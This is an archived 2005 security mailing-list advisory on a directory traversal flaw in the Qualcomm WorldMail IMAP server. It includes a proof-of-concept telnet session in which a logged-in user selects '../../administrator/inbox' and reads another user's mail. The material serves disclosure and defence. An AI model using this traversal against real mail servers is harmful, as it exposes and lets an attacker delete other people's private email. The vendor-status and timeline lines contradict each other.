[NT] Qualcomm WorldMail IMAP Server Directory Traversal
From: SecuriTeam (support_at_securiteam.com)
Date: 11/21/05
- Previous message: SecuriTeam: "[NEWS] Hitachi IP5000 VOIP WIFI Phone Multiple Vulnerabilities"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 21 Nov 2005 16:28:58 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Qualcomm WorldMail IMAP Server Directory Traversal
------------------------------------------------------------------------
SUMMARY
" <http://www.eudora.com/worldmail/> Qualcomm WorldMail is an email and
messaging server designed for use in small to large enterprises that
supports IMAP, POP3, SMTP, and web mail features."
Exploitation of a directory transversal vulnerability in Qualcomm
WorldMail IMAP Server allows attackers to read any email stored on the
system.
DETAILS
Vulnerable Systems:
* Qualcomm Worldmail server version 3.0
The IMAP protocol support the use of multiple folders and contain commands
for authenticated users that can specify specific paths. Qualcomm
WorldMail server allow multiple commands to specify folders outside of the
current user's mailbox.
Attackers can leverage this vulnerability to view and manage any other
user's email messages stored on the system. Attackers can also have the
ability to move any arbitrary folder on the system.
Exploitation is trivial and can be done with a simple telnet client.
Proof of Concept:
c:\> telnet 192.168.0.109 143
* OK WorldMail IMAP4 Server 6.1.19.0 ready
1 login user1 user1
1 OK LOGIN completed
2 select /inbox
* 0 EXISTS
* OK [UNSEEN 0]
2 OK [READ-WRITE] opened /inbox
2 select ./../../administrator/inbox
* 1 EXISTS
* OK [UNSEEN 1] Message 1 is first unseen
2 OK [READ-WRITE] opened ./../../administrator/inbox
2 fetch 1 (RFC822.TEXT)
* 1 FETCH (RFC822.TEXT {131}
this message was sent to administrator
Successful exploitation of this vulnerability allow attackers to view and
delete mail from any user on the system. Attackers may also be able to
affect system stability with the ability to move arbitrary folders on the
affected system.
In order to exploit this vulnerability an attacker would need a valid
login to the email server and the IMAP module would have to be enabled
(default).
Workaround:
Disable the IMAP protocol and use the POP protocol instead.
Vendor Status:
Multiple attempts have been made to inform the vendor of this
vulnerability but to date a response has not yet been received.
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3189>
CAN-2005-3189
Disclosure Timeline:
10/12/2005 - Initial vendor notification
10/27/2005 - Initial vendor response
11/17/2005 - Public disclosure
ADDITIONAL INFORMATION
The information has been provided by
<mailto:idlabs-advisories@lists.idefense.com> iDEFENSE .
The original article can be found at:
<http://www.idefense.com/application/poi/display?id=341&type=vulnerabilities> http://www.idefense.com/application/poi/display?id=341&type=vulnerabilities
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Hitachi IP5000 VOIP WIFI Phone Multiple Vulnerabilities"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NEWS] Multiple Vulnerabilities in Oracle Database (Character Conversion, Extproc, Password Disclosu
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities were
discovered in the (Oracle database server ... password is required to exploit this vulnerability.
... (Securiteam) - [UNIX] Multiple Vendor X Server XC-MISC Extension Memory Corruption Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Multiple Vendor X Server XC-MISC
Extension Memory Corruption Vulnerability ... with elevated privileges. ...
(Securiteam) - [NT] TwinFTP Server Directory Traversal Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... TwinFTP Server is an FTP
server released by ... A vulnerability exists in TwinFTP server that allows a malicious
user ... (Securiteam) - [UNIX] Multiple Vendor X Server fonts.dir File Parsing Integer Overflow Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Multiple Vendor X Server
fonts.dir File Parsing Integer Overflow ... exploitation of an integer overflow vulnerability
in multiple vendors' ... Exploitation allows attackers to execute arbitrary code with elevated
... (Securiteam) - [UNIX] Multiple Vendor X Server BDF Font Parsing Integer Overflow Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Multiple Vendor X Server BDF
Font Parsing Integer Overflow Vulnerability ... (Securiteam)
